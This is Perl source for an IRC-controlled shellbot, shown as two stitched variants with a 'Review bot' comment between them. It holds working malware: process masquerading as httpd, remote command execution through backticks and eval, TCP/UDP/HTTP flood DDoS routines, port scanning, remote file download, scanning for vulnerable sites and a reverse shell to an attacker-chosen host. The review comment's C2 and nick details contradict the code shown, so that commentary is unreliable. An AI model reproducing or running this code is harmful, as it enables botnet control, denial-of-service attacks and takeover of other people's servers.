sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
}
#SCANNER
if ($funcarg =~ /^scan\s+(\d+)\s+(.*)\s+(.*)/) {
@gstring = $3;
$boturl=$2;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Atk33]\002 Scan started. CMD: \002 @cmdstring \002 ");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[Exploiting]\002 ".$url2."\n\n");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdstring?";
print "\n".$url2."\n\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /destructive/ ){
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Results]\002 ".$url2."\n\n");
}
}
else {
print 'Errore: ',$path,$response->status_line, "\n";
}
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Finished]\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3."
seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} +
$bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx","it","uk","wx",
"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al",
"dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba",
"bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn",
"hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il",
"jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md",
"mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn",
"ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr",
"tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"@gstring");
}
my $query="http://buscador.terra.com.br/default.aspx?ca=s&source=Search&query=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
#sendraw("privmsg #Atk33 :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
# NOTE: bY destructive
# pwnz0r!
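Review bot: The section is checked in with only greetz at its head and no analyst-facing header, so the indicators a defender needs are recoverable only by reading all 568 lines; a short comment above the `my $processo = 'httpd';` line would fix that. From the visible lines: the process title is overwritten to look like `httpd` (`$0="$processo"."\0"x16;`), INT/HUP/TERM/CHLD are set to IGNORE, the bot forks into the background and connects to the hard-coded C2 `211.220.193.249:1999` (overridable by the first argument) with nick `negrinhos`, joining `#Own` with key `ddosit`, and answers CTCP VERSION as `mIRC v6.17 Khaled Mardam-Bey`. Command execution goes through `shell` (backticks) and `ircase` (`eval "$1"`), gated only by a sender-nick match against `@adms` — the hostmask is captured at `my $hostmask= $3` but never checked — which is the detail a detection note should call out. The `scan` command gives a network-side indicator as well: candidate hosts come from `http://buscador.terra.com.br/default.aspx?...` and each is probed with `http://raidenzin.freehostia.com/list.txt?` appended to the path, looking for `By` and `destructive` in the response. I would add a header such as `# Sample: Perl IRC shellbot; masquerades as httpd, C2 211.220.193.249:1999 nick negrinhos chan #Own; RCE via backticks/eval gated by nick-only admin check` at the top of the section.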


@ -0,0 +1,989 @@
my $processo = "/usr/local/apache/bin/httpd -UdghdfRL";
if (`ps aux` =~ /httpd -UdghdfRL/){exit;}
$servidor='speed.sin-ip.es' unless $servidor;
my $porta='6667';
my @canais=("#sni-labs");
my @adms=("SPEED", "C4Sh", "ODLTEAM");
my $linas_max=10;
my $sleep=3;
my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();
my $acessoshell = 1;
######## Stealth ShellBot ##########
my $estatisticas = 0;
my $pacotes = 1;
####################################
my $VERSAO = '0.2a';
my $version = "!sni";
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
#####################
# Stealth Shellbot #
#####################
sub getnick {
return "Rx".int(rand(100000));
}
sub getident {
my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php");
my $identchance = int(rand(100));
if ($identchance > 30) {
return $nick;
} else {
return $retornoident;
}
return $retornoident;
}
sub getname {
my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php");
return $retornoname;
}
# IDENT TEMPORARIA - Pegar ident da url ta bugando o_o
sub getident2 {
my $length=shift;
$length = 3 if ($length < 3);
my @chars=('a'..'z','A'..'Z','1'..'9');
foreach (1..$length)
{
$randomstring.=$chars[rand @chars];
}
return $randomstring;
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE, "> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy = "";
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
#print "HOST=$host, PORT=$port, PATH=$path\n";
$AGENT = "get-minimal";
$VERSION = "20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .= ":$port" if $port != 80;
my $request = "GET $path HTTP/1.0\015\012"
. "Host: $netloc\015\012"
. "User-Agent: $AGENT/$VERSION/u\015\012";
$request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
$request .= "\015\012";
print $sock $request;
my $buf = "";
my $n;
my $b1 = "";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq "") { # first block?
$b1 = $buf; # Save this for errorcode parsing
$buf =~ s/.+?\015?\012\015?\012//s; # zap header
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
# print "CODE=$main::http_get_result\n$b1\n";
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/
) {
# redirect
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 2;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0.6);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
notice("$pn", "\001PONG\001");
}
elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
elsif ($args =~ /^(\Q$meunick\E|\Q$version\E)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "$version" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
$meunick = getnick();
nick("$meunick");
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Concluído!") if ($estatisticas);
}
elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
my $hostname="$1";
my $portainicial = "$2";
my $portafinal = "$3";
my (@abertas, %porta_banner);
foreach my $porta ($portainicial..$portafinal)
{
my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($estatisticas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
elsif ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Finished with attacking ".$1.".");
}
# Duas Versões simplificada do meu Tr0x ;D
elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotese;
my $fim = time + $tempo;
my $pacota = 1;
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1");
}
}
elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $faixaip="$1";
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotes;
my $fim = time + $tempo;
my $pacota = 1;
my $alvo;
while ($pacota == "1") {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
for (my $faixa = 1; $faixa <= 255; $faixa++) {
$alvo = inet_aton("$faixaip.$faixa");
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
if ($faixa >= 255) {
$faixa = 1;
}
}
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo");
}
}
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");
}
}
elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
unless ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^root/)
{
if(rooting($printl))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Rooting]\002 Nothing rootable!!");
}
}
elsif ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval "$1";
}
elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^sair/) {
quit();
}
elsif ($case =~ /^novonick/) {
my $novonick = getnick();
nick("$novonick");
}
elsif ($case =~ /^estatisticas (.*)/) {
if ($1 eq "on") {
$estatisticas = 1;
msg("$printl", "Estatísticas ativadas!");
} elsif ($1 eq "off") {
$estatisticas = 0;
msg("$printl", "Estatísticas desativadas!");
}
}
elsif ($case =~ /^pacotes (.*)/) {
if ($1 eq "on") {
$pacotes = 1;
msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");
} elsif ($1 eq "off") {
$pacotes = 0;
msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");
}
}
}
sub rooting {
my $printl=$_[0];
my $kern=`uname -a`;
